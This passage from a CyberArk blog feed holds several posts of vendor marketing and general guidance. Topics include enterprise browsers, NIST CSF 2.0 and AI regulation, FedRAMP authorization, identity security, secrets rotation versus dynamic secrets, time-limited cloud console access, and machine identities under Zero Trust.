Workers will find that using a secure enterprise browser will be a better experience. Users can log into their enterprise resources from the enterprise browser without requiring reauthentication for every federated application and those that are password protected, accelerating the user’s workflow to a single click. The enterprise browser secures users without impacting productivity. It’s a win-win scenario.

Improved Flexibility for Security Compliance and Privacy

Compliance concerns are becoming greater and greater as new cybersecurity regulations require tighter restrictions on privacy. CISOs are also held responsible by their boards for ensuring their organizations comply with existing and new security regulations. Compliance and privacy teams continually work toward ensuring organizations adhere to the regulations that prescribe how corporate data is used and stored and that users and customers receive the privacy required for their data.

Consumer-based browsers store everything – from passwords to credit card data – in, say, Google Cloud. They also share data with third-party apps, expanding the attack surface. The enterprise browser shifts control back into the hands of security teams, providing organizations the flexibility to determine which data can reside in the cloud and which should remain on corporate premises. It offers built-in security to support compliance and help ensure privacy regulations are already in place. This capability alleviates concerns from compliance and privacy teams, knowing that critical enterprise data remains secure through flexible storage options and addresses privacy concerns before users access applications and data resources.

Secure Identities With an Enterprise Browser

As the industry continues to fend off new attacks and an evolving attack surface, our customers cannot be exposed to vulnerability gaps from unprotected browsers. In the current reality, the browser is an island among the IT admin’s security infrastructure with less consideration for security. This approach must change for organizations to implement an enterprise browser fully integrated within the security stack to help ensure identities don’t become compromised. However, we must balance security with worker productivity and offer a frictionless user experience.

It’s critical for your future, so now is the time.

Learn more about CyberArk Secure Browser and take a step toward securing your organization and all its identities.

Gil Rapaport is CyberArk’s Chief Solutions Officer. 

]]>
CIO POV: What Makes a Good Neighbor in a Bad Cyber Neighborhood https://www.cyberark.com/blog/cio-pov-what-makes-a-good-neighbor-in-a-bad-cyber-neighborhood/ Thu, 21 Mar 2024 12:53:37 +0000 https://www.cyberark.com/?p=188340 What Makes a Good Neighbor in a Bad Cyber Neighborh

“It’s discouraging to try to be a good neighbor in a bad neighborhood.” –William Castle

This quote from the late American horror film director has recently been running through my head as I think of the new NIST CSF 2.0 framework, the new AI regulations and the myriad software product certificates. In a nasty neighborhood of bad actors, these frameworks, regulations and certifications act as good neighbors. They are poised to enable organizations of any size to protect themselves against a barrage of cyberattacks. But, I also see the complexity they bring to CIOs and CISOs of various organizations in ensuring the right balance of security initiatives and alignment to frameworks, regulations and certifications, especially in cases where technology advances faster than a framework or regulation.

The following recent events have made me think about the three areas in which we as a collective can influence the cyber world positively, which is otherwise packed with many negative forces.

1. A Decade in the Making – CSF 2.0 is Finally Here

In January 2024, nearly 10 years after its first release, the National Institute of Standards and Technology (NIST) released an updated 2.0 version of the Cyber Security Framework (CSF). As you may already know, CSF 2.0 is designed to be used by organizations of all sizes across all sectors as opposed to its predecessor, which focused only on critical infrastructure. CSF 2.0 also takes into consideration technologies that have emerged since the original iteration of the framework and elevates the importance of supply chain risk management and cybersecurity governance.

While the CSF 2.0 is a vast improvement over its 10-year-old predecessor, the problem with this framework remains the same – the voluntary compliance to this framework has essentially failed to improve or implement effective cybersecurity. In July 2022, 10 of the 24 U.S. federal agencies received an F on cybersecurity practices, according to the Federal Information Technology Acquisition Reform Act (FITARA) scorecard. Fast forward to January 2024, nearly half of the same 24 federal agencies improved their scores to C or D in the same category.

This improvement comes at the heels of the Biden administration’s 2021 Executive Order on Improving the Nation’s Cybersecurity (EO 14028), which mandated all federal agencies to transition to a Zero Trust approach to cybersecurity with specific guidance on securing pillars such as identities and endpoints. The progress of every federal agency is tracked and aligned to NIST’s CSF 2.0. The point is that NIST’s CSF 2.0 is an excellent guide to reducing cyber risks, but that on its own will not do the trick and secure your organization. Much like the EO 14028, what will push the needle forward is if executives and the board of any organization mandate a regular performance assessment against CSF 2.0 to ensure continuous risk assessment and improved security posture to keep your organization secure.

2. Regulation vs. Innovation – Problem or Peril?

The European Union has led the charter for regulatory frameworks and set an example for the world. Having set the standard and implemented regulations for data privacy, carbon emissions and mergers, the EU has done the same for AI. The EU AI Act was passed in February 2024. It will be implemented in 2026 and seeks to regulate the use of AI models based on their potential risks while applying stringent rules to riskier applications vs. separate regulations for general-purpose AI models such as ChatGPT. Following the EU, President Biden issued his AI executive order (EO 14110) in the United States, seeking to manage the risks stemming from AI and protect the government and American citizens.

The EU AI Act and the U.S. Executive Order on AI seek to preserve and protect the data privacy of millions of residents. To do this, there is a particular focus on identifying and mitigating the risk of fraud, misinformation and disinformation. So, while these new regulations continue to be introduced in the market, what good is data privacy without cybersecurity? This often leads me back to my drawing board. I ask myself, is my cybersecurity strategy still producing optimal results for my organization, or do I need to make changes?

3. Complexity of the Number of Certifications

Certifications formally recognize a product, system or service’s compliance with specific standard requirements. These certifications often serve as a benchmark for customers and prospects evaluating various companies and technology products to ensure that a product’s functionality, reliability, usability, efficiency and manageability are on par with the set requirements. However, the number and types of certifications can often put enormous pressure on organizations that seek to get their products certified or maintain certification. Software product certifications include, but are not limited to, NERC and the many types of ISO certifications like SOC 1 Type 1, SOC 2 Type 2, CMMC and FedRAMP. The list goes on.

However, if we closely examine the requirements of many of these certifications, we’ll find many overlaps. As an industry, I wish we would strive toward consolidating the common parts of every – or at least many – certificates and focus on differentiation when dealing with a specific certification. But I won’t hold my breath for this day to come.

My Advice on How to Effect Change in a Bad Neighborhood

If you are a CIO or CISO, I recommend that you take ownership as a good neighbor and actively support your industry peers and organizations like NIST and NCSC, which develop guidelines for securing a nation’s critical infrastructure and any organization of any size across any sector. I recommend you consider the following as the duties of a good neighbor to slowly and effectively increase the good in the bad neighborhood.

  • Engage in bi-directional partnerships. Technology vendors and NIST must ramp up their collaboration to regularly review and update existing frameworks with faster feedback loops to keep up with the changing technology landscape. In a world increasingly influenced by AI, the industry cannot afford to wait another 10 years for NIST to update its CSF again.
  • Harden your cybersecurity foundation. No matter which regulation or framework you are dealing with, a robust security posture will remain the bedrock for regulatory compliance and continuously protecting your sensitive assets against relentless bad actors.
  • Mandate metrics. If your organization leverages CSF 2.0 or its earlier version to reduce risks, ensure that you mandate regular evaluations of specific cybersecurity and risk assessments to improvise and iterate as necessary. Voluntary evaluations can take a backseat amid a time crunch, but a mandate is often helpful in ensuring thorough evaluations regularly and periodically.
  • Remember that certifications do not necessarily correlate to good security posture. My advice to any organization evaluating and procuring security products based on certifications is to remember that the success of your security programs is on implementing your initiatives within your specific environment, not using a standalone certified product.

Finally, I advise all CIOs and CISOs to do their part as good neighbors and help other good neighbors. For example, encourage proactive interaction and partnership with NIST or other governing bodies. This partnership will go a long way in a world where technology moves faster than the pace at which government can effect change. As a leader, share your experiences and knowledge base with the new generation of CIOs and CISOs. These good neighbor gestures will help build a strong community to protect against bad ones.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

]]>
CyberArk SaaS Solutions Achieve FedRAMP® High Authority https://www.cyberark.com/blog/cyberark-saas-solutions-achieve-fedramp-high-authority/ Tue, 19 Mar 2024 12:38:43 +0000 https://www.cyberark.com/?p=188038

I’m honored to share that CyberArk is FedRAMP® High Authorized and ready to support U.S. federal agencies in securing access to critical government data and systems, meeting Zero Trust mandates and advancing their missions.

Two of our leading identity security SaaS offerings, CyberArk Endpoint Privilege Manager and CyberArk Workforce Identity, have achieved Federal Risk and Authorization Management Program (FedRAMP) High Authority to Operate certification, and are now available on the FedRAMP Marketplace.

This designation reinforces CyberArk’s long-standing commitment to providing trusted, independently verified solutions that meet the U.S. government’s most stringent security requirements. And it comes on the heels of the FedRamp Authorization Act, a law that streamlines the approval process for cloud services by enabling federal agencies to implement FedRAMP-authorized solutions without additional security and risk assessments. As a standardized approach, FedRAMP reduces duplicative efforts and cost-inefficiencies while promoting innovation across the federal government.

The explosion of new identities, new environments and new attack methods has rapidly expanded the attack surface, creating an acute need for both public and private organizations to secure all identities, human and machine. By delivering FedRAMP High-Authorized identity security solutions, CyberArk is uniquely positioned to help federal agencies accelerate secure cloud adoption while protecting critical assets from damaging ransomware, supply chain attacks and emerging AI-fueled threats.

Digital Visionary Theresa Payton Weighs in on the State of Federal Cloud Adoption

I had the opportunity to speak with Theresa Payton, former White House CIO, bestselling author and founder and CEO of Fortalice Solutions, about today’s government-wide migration to the cloud. In our conversation below, we explore key opportunities and challenges, and the push to remove adoption barriers.

The federal government’s shift to the cloud has taken place slowly but surely over the past decade. Then came an unanticipated disruptor: COVID-19. Suddenly, cloud services became even more critical to advancing agency missions. Can you describe an example in action?

“When the pandemic hit, agencies were forced to work on the fly to adjust how they do business. Hitting fast forward on cloud initiatives certainly had its benefits. One example comes from the federal civilian area: The U.S. Postal Service, backed by AWS , rapidly scaled up their COVID test kit website and quickly responded to over 100 million households requesting kits.”

According to MeriTalk research, only 30% of federal, state and local government IT leaders say their cloud strategy has kept pace with this accelerated adoption; 56% say managing and securing data is their biggest challenge. Every new cloud-based initiative generates a massive number of identities, further exacerbating these concerns. How can government security leaders turn things around?

“Agencies must come to terms with several cloud-based risks that lurk beneath the surface in this new technology landscape. To see just how many threats a cloud-based organization with under-developed security protocols will face, look no further than cloud identity and access management. Beyond the schemes of cybercriminals, non-malicious human error on its own has the potential to hinder mission-critical functions in the form of misconfigured networks and mismanaged controls. Now, as agencies and private sector organizations no longer have to “build the plane while they fly it,” they should take the time to resolve any built-up technical debt and ensure proper configuration is factored into any new cloud components.”

More sensitive government information flows across cloud infrastructure and applications than ever before, yet federal cloud adoption lags the commercial sector. Procurement hurdles are contributing factors. Will measures outlined in the FedRamp Authorization Act help agencies fast-track efforts?

“Federal agencies and commercial organizations face numerous regulatory and compliance hurdles to efficiently conduct business and move the mission forward. Regulations such as FedRAMP and CMMC, though critical to discerning organization, service and product suitability, can lead to a lack of agility and efficiency when combined with each other and with other compliance requirements. Much like how multiple government agencies have required their own suitability processes on top of clearances, overlapping but differing compliance processes can lead to backlogs and delays in achieving mission success. But don’t mistake the differing regulatory requirements for being redundant or unnecessary. Look no further than the major 2020 cyber incident that was SolarWinds to understand the dire implications of any missteps in supply chain risk management.

Ultimately, threading the needle of decreasing the compliance burden while maintaining the necessary level of regulatory scrutiny may be a tightrope walk, but laws such as the FedRamp Authorization Act are a step in the right direction.”

How can programs like FedRAMP help the Department of Defense and other federal agencies achieve their Zero Trust goals and advance national cybersecurity priorities?

“FedRAMP had already begun preparing for the Zero Trust cybersecurity posture before the DoD released its Zero Trust Strategy, but as new tools, technologies and threats arise, continued attention will need to be paid by government and government-adjacent regulatory programs.

The ‘never trust, always verify’ mentality puts the security responsibility on everyone involved, which includes products and services provided to the government. By adopting Zero Trust-focused compliance requirements, FedRAMP can place a greater onus on private sector organizations to launch the federal government efficiently and expediently into a more secure and more efficient future.”

CyberArk is FedRAMP Ready to Serve

Identity-based attacks aren’t just the future. They’re the present. The front line. The new battlefield.

Fedral agencies require advanced identity security capabilities to meet their dynamic and evolving cybersecurity needs. As the pioneers of privileged access management, CyberArk offers the most complete and extensible Identity Security Platform in the world, empowering government agencies with a security-first approach grounded in Zero Trust. By applying intelligent privilege controls to all identities – human and machine – CyberArk enables secure access to any resource, anywhere, everywhere – with a single, unifed platform. Today, more than 8,000 organizations worldwide trust CyberArk to protect their critical assets and surround every identity with a powerful force field of continuous protection.

CyberArk stands FedRamp Ready to support your federal agency, protecting sensitive government data and infrastructure and helping you move forward, fearlessly, to achieve mission success and unlock the endless potential of progress, growth, innovation and hope.

Troy Grubbs is U.S. federal sales director at CyberArk.

]]>
How to Align Your Security Strategy with NIST Cybersecurity Framework 2.0 https://www.cyberark.com/blog/how-to-align-your-security-strategy-with-nist-cybersecurity-framework-2-0/ Thu, 14 Mar 2024 14:42:53 +0000 https://www.cyberark.com/?p=188051 NIST Cybersecurity

After a decade in the making – or waiting, as the case may be – the National Institute of Standards and Technology (NIST) has released the first major revision to its Cybersecurity Framework (CSF), a set of voluntary standards and best practices for managing cybersecurity risks. NIST CSF 2.0, released on Feb 26, 2024, expands the scope and applicability of the framework to cover more types of organizations and industries, including the private sector, government and nonprofits. The new framework comprises six core functions: Govern, Identity, Protect, Detect, Respond and Recover. (I will detail these functions later on in this blog post.)

In this era of heightened digital vulnerability, the need for robust security measures has never been more pressing. NIST CSF 2.0 provides organizations with detailed guidance on managing their cybersecurity risks based on six main functions. The new framework includes a list of desired outcomes for organizations when building their cybersecurity strategy. It does not, however, detail how to achieve those outcomes in an identity security program – this is where you’ll want to take the advice of a trusted partner that can provide you with a best practices framework to follow.

This blog post will overview how identity security best practices related to people, processes and technology can help organizations adhere to NIST CSF 2.0 guidelines. The published guidelines are constructed on six interconnected functions, as shown in the figure below.

NIST Cybersecurity Framework

NIST CSF 2.0 functions (Source: https://www.nist.gov/)

 

Function 1: Govern – Understanding the Organizational Strategy and Policy

Focused on organizational strategy, the Govern function guides actions to achieve and prioritize outcomes in alignment with the organization’s mission and stakeholder expectations. NIST highlights understanding organizational context, establishing cybersecurity strategy and supply chain risk management, defining roles and responsibilities and enforcing policies.

Best practice identity security frameworks can help you achieve these goals. Organizations need clear and documented KPIs for their identity security programs.  Such frameworks could offer risk-based prioritization guidance to help accelerate risk management decisions and determine key KPIs.

A comprehensive privileged access management (PAM) program should also include solutions for securing third-party access to reduce supply chain-related risks as much as possible. According to NIST, vulnerabilities resulting from external identities can directly impact an organization’s security. By identifying and mitigating those risks, organizations can enhance their overall cybersecurity posture and better protect themselves against threats.

Function 2: Identify – Mapping and Understanding Organizational Assets and Risks

The Identity function covers identifying and prioritizing the organization’s current cybersecurity risks in alignment with the strategy and mission needs. This function involves identifying opportunities for improvement in policies and processes related to risk management and informing actions across all organizational functions.

A best practices framework can also help you recognize high-risk resources and identify common identities such as IT admins, developers, workforce and machine identities. Advanced solutions for account discovery,  intelligence and auditing can help with ongoing control and visibility of your environment.

Function 3: Protect – Securing Risky Assets

The Protect function involves utilizing capabilities to safeguard sensitive assets and reduce or eliminate the risk of incidents. Outcomes covered by this function include identity management, authentication and access control, awareness and training, data security, platform security and the resilience of technology infrastructure.

Thorough identity security programs can help address all these subcategories. A unified set of solutions that enables secure access to organizational assets with intelligent privilege controls, regardless of the environment (i.e., cloud services, elastic workloads, long-lived systems and high-risk apps) is recommended. Solutions include:

Function 4: Detect – Finding and Analyzing Attacks

The Detect function calls for continuous monitoring of assets and detecting anomalies from internal users and external vendors, as well as incident response and recovery solutions. Taking a proactive stance on risk management can significantly enhance your ability to uphold this function.

Centralized audit and identity threat detection and response (ITDR) capabilities, should be applied consistently across all sessions. This entails centralized monitoring of employee and external vendor access to corporate resources.

Function 5: Respond – Acting Upon and Containing Attacks

In the NIST CSF 2.0, the Respond function outlines the necessary actions to take upon detection of risky activities, including containment and eradication of incidents. It covers incident management, analysis, mitigation reporting and communication. The first step in this process is deploying your incident response (IR) plan and conducting an ongoing investigation to ensure an effective response.

Once again, intelligent privilege controls and expert remediation services can help you detect and identify threats faster, with broader coverage, quick response and minimal damage.

Function 6: Recover – Restoring Affected Assets

This function involves restoring assets and operations affected by the incident and executing the recovery portion of the IR plan. This function covers reporting, documenting and communicating the outcomes and consequences of the incident, both internally and externally.

Strong identity protections facilitate easier auditing of malicious access and can help reduce the damage and allow faster and easier recovery. For instance, access can be deemed invalid if not provisioned through a PAM solution. Additionally, through lessons learned, the recovery process identifies relevant attack methods, targeted identities and resources, which triggers new risk assessments and reassessments of the security roadmap and plan.

The six functions of NIST CSF 2.0 are circular and interconnected. Therefore, the greater the investment organizations make in preparing and implementing the necessary protections, the smoother their ability to respond to threats and recover from cybersecurity incidents.

Unified under CyberArk’s identity security platform, our solutions align closely with NIST’s approach, offering comprehensive support and services for securing all identities – human and machine – across hybrid and multi-cloud environments.

Lilach Faerman Koren is a senior product marketing manager at CyberArk.

]]>
Why Identity Security Is Essential to Cybersecurity Strategy https://www.cyberark.com/blog/why-identity-security-is-essential-to-cybersecurity-strategy/ Fri, 08 Mar 2024 17:14:29 +0000 https://www.cyberark.com/?p=187951 Cybersecurity Strategy

In the modern digital landscape, cybersecurity isn’t just a technical challenge – it’s a business imperative. At the heart of cybersecurity is identity security – the principle that the right people have the right access at the right time. As we venture further into the digital world, protecting the business from modern threats is crucial, which inherently adds complexity, making smart privilege controls a must-have step toward an identity-first strategy.

The cost of bypassing identity security can be high – data breaches, loss of customer trust and financial penalties are only part of the leadership issues in digital service management. For example, a simple case of an employee having excessive access rights can lead to data theft or sabotage.

Identity security is not just about authentication and authorization but also visibility, governance and compliance. For instance, the insurance industry increasingly recognizes identity security as a foundational element of effective cyber insurance, highlighting the need for robust identity and access management (IAM) practices to mitigate cyber risks. These criteria demonstrate the insurance industry’s commitment to elevating identity security as the foundation of cyber resilience, ensuring that organizations are well-equipped to protect against and respond to cyber threats.

Identity security is the source of trust and security for all other security controls and policies. In this blog post, I’ll explain why security-first identity is essential to your cybersecurity strategy, and organizations can leverage identity as a key enabler of security in the digital age.

Why Identity is the Future of Security

Identity is the core of cybersecurity, as it defines what constitutes good or bad, legitimate actions – and what’s considered malicious behavior. Identity is the primary way organizations can determine and manage who has access to which resources – and under what conditions – and ensure that those access privileges are used appropriately. Identity is how organizations can monitor and audit their users, devices, applications, activities and behaviors and detect and respond to anomalies or incidents.

With identity security, you can know who’s accessing data and systems, why they’re accessing it and what they’re doing with it. Without identity security, you cannot enforce security policies and compliance requirements, and your organization cannot hold users and partners accountable for their actions. Identity security is especially critical in today’s context of digital transformation, cloud migration, remote work and mobile devices. These trends have increased the complexity and diversity of identities, the attack surface and the potential for identity compromise.

Your security strategy must accommodate many identities, such as employees, customers, partners, contractors, vendors, devices, applications and services, each with distinct levels of trust and access requirements. You must also deal with various identity-related challenges, such as identity sprawl, orphaned accounts, privileged access abuse, credential theft, password reuse, shadow IT and identity fraud. To address these challenges, you can take a security-first identity approach, which means that identity security is not an afterthought or a definitive solution but rather a creation of principles that guide the construction of your cybersecurity strategy. A security-first identity approach means implementing security controls and policies based on the identity context and risk profile of your users, devices and applications.

How to Cultivate Identity as a Key Security Enabler

To establish identity as a key security enabler, you must adopt an identity security framework that covers the following:

  • Identity lifecycle management – involves creating, provisioning, updating and de-provisioning identities and access privileges for all users, devices and applications based on their roles and responsibilities within the organization. It also ensures that identities and access privileges are accurate, up-to-date and compliant with the organization’s policies and regulations.
  • Identity and access management – involves verifying and validating the identities and access privileges of all users, devices and applications based on their context, behavior and risk level. Identity and access management also involves enforcing granular and dynamic access policies and rules, such as least privilege, multi-factor authentication (MFA) and conditional access.
  • Identity protection and intelligence – involves detecting and preventing threats and attacks that target the identities and access privileges of all users, devices and applications. Identity protection and intelligence also include analyzing and correlating the data and insights from the identity security framework and applying advanced analytics, machine learning (ML) and artificial intelligence (AI) to identify and respond to anomalies, incidents and risks.

The Benefits of Prioritizing Identity Security

By implementing an identity security framework, you can achieve the following benefits:

  1. Improved security posture. Organizations can reduce the attack surface and the potential for identity compromise by ensuring that only the right people have access to the right resources under the right conditions and use their access privileges appropriately. Organizations can also improve their visibility and control over their data and systems by monitoring and auditing the activities and behaviors of their users, devices and applications – and detecting and responding to any anomalies or incidents.
  2. Improved compliance and governance. Organizations can comply with security and privacy regulations and standards that apply to the industry and region, ensuring that their identities and access privileges are accurate, up to date and compliant with their policies and requirements. Organizations can also demonstrate their accountability and transparency by generating reports and alerts for their internal and external stakeholders and providing evidence and proof of their compliance and security efforts.
  3. Increased productivity and efficiency. Organizations can streamline and automate their identity security processes and workflows, eliminating manual and error-prone tasks such as password resets, access requests and approvals. Organizations can also optimize their resources and costs by reducing the complexity and overhead of managing and maintaining multiple and different identity security solutions.
  4. Improved user experience and satisfaction. You can provide your users and partners with a seamless and secure access experience, allowing them to access the resources they need. When needed. from any device and location. Organizations can also empower their users and partners with self-service capabilities and delegated administration, allowing them to manage their identities, access privileges and request and approve access changes.

Identity security is foundational to robust cybersecurity programs and critical for managing related controls and policies. By prioritizing identity security in cybersecurity strategies, organizations can effectively determine and manage who has access to which resources under what conditions and ensure that these access privileges are used appropriately. This approach is critical to establishing a robust and effective cybersecurity framework, considering it relies on identity as a key security enabler.

Claudio Neiva is CyberArk’s Field Technology Director (LATAM), PAM and Identity Security.

]]>
Why Your Organization Needs Dynamic Secrets and Rotation https://www.cyberark.com/blog/why-your-organization-needs-dynamic-secrets-and-rotation/ Tue, 05 Mar 2024 15:57:40 +0000 https://www.cyberark.com/?p=187849 Dynamic Secrets and Rotation

In today’s rapidly evolving digital landscape, organizations confront a formidable array of cyber threats, with attacks and data breaches becoming increasingly prevalent. As businesses embrace transformative technologies such as AI, automation, cloud-native architectures, microservices and containerization, the proliferation of machine identities has surged, often surpassing human identities. CyberArk research underscores this exponential growth of machine identities, highlighting the critical need for robust secrets management best practices to safeguard machine identities. However, navigating the landscape of secrets management can be daunting, and missteps in selecting the right approach can leave organizations vulnerable to attacks.

In this blog post, we’ll delve into two fundamental secrets management approaches – dynamic secrets and secrets rotation – providing clarity on their distinct roles and guiding you in selecting the optimal solution for your organization’s unique needs that will help mitigate risk effectively.

Dynamic Secrets: Enhance Security in Agile Environments

Similar to secrets rotation, dynamic secrets play a crucial role in minimizing the attack surface and mitigating the exposure of sensitive information. Operating on the principle of on demand or just-in-time (JIT) credential generation, dynamic secrets are ephemeral and short-lived, with a predetermined time to live (TTL). Once this TTL expires, the credential is rendered invalid, bolstering security in ephemeral cloud-native environments or microservices architectures where service consumers are transient.

However, while dynamic secrets offer significant advantages in dynamic environments, they may not be ideal for auditing account activity over an extended period. This is because the ephemeral nature of dynamic secrets can result in varying user account names, complicating audit trails.

Moreover, one common pitfall organizations encounter is setting a long TTL or perpetually renewing the same dynamic secret. This practice essentially transforms the dynamic secret into a static one, as it isn’t changed frequently enough. Consequently, the risk of a leak or unauthorized access increases substantially. This is a prime example of trying to fit the wrong solution into a use case.

Secrets Rotation: Audibility and Compliance for Persistent Accounts

Rotated secrets, a cornerstone of robust security practices, are subject to regular replacement at scheduled intervals. This proactive approach to secrets management isn’t just a best practice; it’s often a regulatory requirement enforced by stringent standards such as PCI DSS, which mandates rotation cycles of up to 90 days.

A key between rotated and dynamic secrets is that only the secret information is changed during the rotation process, while the account name or identifier remains consistent. This characteristic makes rotated secrets particularly well-suited for long-standing access or accounts expected to persist beyond the lifespan of individual secrets.

While the principles of rotation are simple, the successful implementation of secrets rotation demands a sophisticated solution that can automate and orchestrate the process with precision and reliability. By using automation and advanced rotation capabilities, organizations can uphold security standards, mitigate risks and safeguard their sensitive information effectively.

Building a Flexible and Comprehensive Secrets Management Strategy

Both dynamic secrets and secrets rotation serve distinct purposes within a comprehensive secrets management strategy, and each has unique benefits for specific use cases and environments.

Here’s how organizations should employ each approach:

  • Dynamic Secrets should be used in ephemeral environments where temporary access is needed and the time to live is less than when a secret should be rotated. For example, less than 90 days if you follow the PCI DSS standard.
  • Secrets Rotation is ideal for auditing and tracking access for persistent accounts or when the account needs to live longer than the amount of time when a secret needs to be changed.

Organizations can effectively address a broader range of security requirements and operational challenges by incorporating both dynamic secrets and secret rotation into their secrets management practices. Dynamic secrets cater to the dynamic nature of modern IT environments, while secrets rotation strengthens long-term security and compliance adherence. Together, they form a robust and comprehensive approach to safeguarding sensitive information and mitigating security risks effectively. Benefits include:

  • Improved operational efficiency. Allows you to automate the creation, distribution and revocation of secrets while reducing the manual effort and human error involved in secrets management.
  • Enhanced auditability and visibility. Enables you to track and monitor the usage and lifecycle of secrets and identify abnormal or malicious behavior.

Increased scalability and flexibility. Equips you to support different types of secrets and environments, so your organization can adapt to changing business and security needs.

Maximizing Security with Dynamic Secrets and Rotation

Dynamic secrets and secrets rotation are essential components of a comprehensive secrets management strategy. By understanding their distinct roles and applying them appropriately, organizations can enhance their security posture, mitigate risks and effectively secure their sensitive information against the ever-changing threat landscape.

A SaaS-based secrets management solution empowers organizations with the flexibility required to establish a comprehensive secrets management strategy.

To learn more, check out this on demand webinar, where we explore the principles of identity security and discuss the use cases behind dynamic secrets and rotation.

John Walsh is a senior product marketing manager at CyberArk.

]]>
How Time, Entitlements and Approvals (TEA) Can Secure the Keys to Your Cloud https://www.cyberark.com/blog/how-time-entitlements-and-approvals-tea-can-secure-the-keys-to-your-cloud/ Thu, 29 Feb 2024 23:03:39 +0000 https://www.cyberark.com/?p=187824 Feature image for time, entitlements and approvals cloud access blog post. Image is a clock superimposed into clouds against a blue sky backdrop.

A popular topic of conversation in my day-to-day work is how to secure privileged access to cloud management consoles and workloads. And that’s no surprise, considering more and more applications and workloads are migrating to the cloud.

Up until recently, the answer has typically been clear when it comes to identity security and privileged access management (PAM). It’s simple: first, you manage credentials by securing them in a vault. The next step is to rotate them. I’ll even give you extra points if you implement session management for recording and isolation between the end user machines and target systems.

This advice has been the same for quite a while now, and for good reason. It works. But new best practices – like zero standing privileges (ZSP) – are emerging to secure federated privileged access in the cloud.

[Author’s note: In this blog, I will focus solely on access to cloud management consoles.]

A Cloud Access Revolution

Things become a bit more complicated when we start talking about PAM for cloud consoles such as AWS, Azure or GCP. But why would a strategy that’s worked for years suddenly not be as straightforward for the cloud?

One primary reason is that cloud service provider (CSP) consoles behave much like SaaS applications. A key benefit is that they are easily accessible from anywhere via a web browser with internet connectivity.

This accessibility is something that CSP console end users – notably, developers and cloud engineers – love and have come to expect. At the same time, this benefit clashes with the user experience (UX) that PAM best practices have previously constrained them to.

Let’s dive into an example of this challenge…

Imagine an application running in AWS, Azure or GCP that’s not functioning as expected. Our DevOps engineer, Chuck, needs to gain access to the CSP console or command line interface (CLI) to diagnose and fix the issue. Chuck must first access the PAM solution that securely manages the CSP credentials, following the previously mentioned best practices. Once he obtains access to that solution, he must connect to the cloud console via session management.

There’s a bit of irony in this user experience – the CSP console is supposed to be a SaaS application available anywhere from a web browser.

From Chuck’s point of view, restrictions are preventing him from working natively on his system with his own credentials. Not to mention, things become even more difficult if he wants to use the CSP CLI like many developers. If you’re still with me, let’s acknowledge that this scenario doesn’t exactly spotlight smooth accessibility.

Suppose we flip the script and look at this from the security perspective. In that case, a certain number of standing credentials with privileged entitlements must be available at any given time for end users (and potentially attackers) to utilize. Not a great scenario either.

The Time, Entitlements and Approvals (TEA) Concept Enters the Picture

So, how do we design a better experience for our developers and cloud engineers while keeping security foundational? Combining the concept of time, entitlements and approvals (TEA) is an approach we can use to our advantage. With TEA, we no longer need to manage standing credentials for “what if” scenarios and force developers and cloud engineers to use them.

Graphic illustration how time, entitlements and approvals (TEA) tightens control over cloud access.

From the example above, let’s see how TEA can provide a better experience for our DevOps engineer, Chuck. When Chuck needs to gain access to the CSP console to diagnose and fix the app issue, he no longer needs to go to another solution to utilize standing credentials through a proxy. Instead, he can log in to the CSP console or CLI natively with his own federated identity.

In addition to this improved user experience, Chuck’s federated identity has ZSP to the CSP console. This setup means that no entitlements are available by default, providing an essential layer of security. Only after the necessary approvals are met (automatic, contextual, manual) will privilege access be granted. This access is only approved for the window of time required and with specific entitlements (aka the principle of least privilege (PoLP)). An audit will also readily pinpoint the work Chuck performed during this period because he logged in with his federated identity. Once the approved session expires, those entitlements are automatically revoked, taking Chuck back to ZSP and securing our environment.

Reimagining PAM and Its TEA UX Makeover

PAM has been an essential pillar of cybersecurity for years and will continue to be even as more development moves to the cloud. However, this doesn’t mean PAM shouldn’t adapt. Concepts such as ZSP, just-in-time (JIT) and dynamic access are paving the way for the evolution of PAM.

It’s (TEA) time to give developers and cloud engineers their desired user experience – one that capitalizes on the benefits that SaaS and CSP consoles provide while still enforcing the necessary level of security. And it all comes down to the right combination of time, entitlements and approvals.

Let the evolution of PAM continue.

Mike Bykat is a global solution strategy architect for Cloud Security at CyberArk.

]]>
Why Machine Identities Are Essential Strands in Your Zero Trust Strategy https://www.cyberark.com/blog/why-machine-identities-are-essential-strands-in-your-zero-trust-strategy/ Tue, 27 Feb 2024 16:07:20 +0000 https://www.cyberark.com/?p=187783 Zero Trust Network Architecture

Just like a snagged strand can ruin your garment, overlooking the security of machine identities can tear the very fabric of Zero Trust that protects your organization from bad actors. As a quick refresher, Zero Trust operates on the principle that no entity inside or outside the network perimeter is trusted by default. As we usher in an era where the traditional network perimeter has dissolved due to cloud services, remote work and mobile access, the necessity for Zero Trust becomes even more pronounced.

However, too often, a critical and overlooked component of this framework by security teams is the management of machine identities. But while security teams don’t always apply Zero Trust principles to machine identities, for attackers, unprotected machine identities are another entry point to your organization’s sensitive data. And the problem is getting bigger.

Machine Identities Now Outnumber Human Identities by a Factor of 45 to One

A machine identity is a unique identifier distinguishing software code, applications, virtual machines or even physical IoT devices from others on a network. It’s used to authenticate and authorize the machine to access resources and services. Machine identities use secrets, API keys, Cloud Access Keys, digital certificates and other credentials to enable machines to communicate securely with other systems.

As organizations digitally transform, the number of machines – applications, containers, automation scripts, virtual machines, Lambda and other computing functions – grows exponentially. Machine identities now outweigh human identities by a factor of 45:1. Therefore, we can assume they also have greater access to sensitive data than human identities. Without the right policies and automation, machine identities and secrets become a vastly expanding attack surface for cyber adversaries.

Digital Transformation: Fueling the Proliferation of Machine Identities and Secrets

Most organizations today enable their missions with software as a service (SaaS) applications – storing data in one or more clouds and even developing software applications to serve their customers. The CyberArk 2023 Identity Security Threat Landscape 2023 report finds that organizations expect an increase of 68% in the number of SaaS applications deployed in their environment. Additionally, another CyberArk report indicates that 80% of organizations will use three or more cloud service providers (CSPs). This digital transformation spurs the proliferation of machines in our networks and the corresponding growth in the number of secrets needed to access IT and other resources securely. And the rapid growth has outpaced our ability to manually track the number, purpose and location of machines and secrets. That’s why it’s unsurprising that 65% of organizations either took steps to protect machine identities last year or plan to do so in the next 12 months.

The dynamic nature of hybrid and multi-cloud environments and DevOps practices requires automated secrets rotation and issuance, renewal and revocation of machine identities. Manual processes are prone to errors and cannot keep pace with the speed at which modern IT environments change. To protect your organization’s digital assets holistically, it’s imperative that you implement a robust Zero Trust strategy that includes a plan for securing and managing machine identities and their secrets.

Why Machine Identity Management is a Zero Trust Strategy Essential

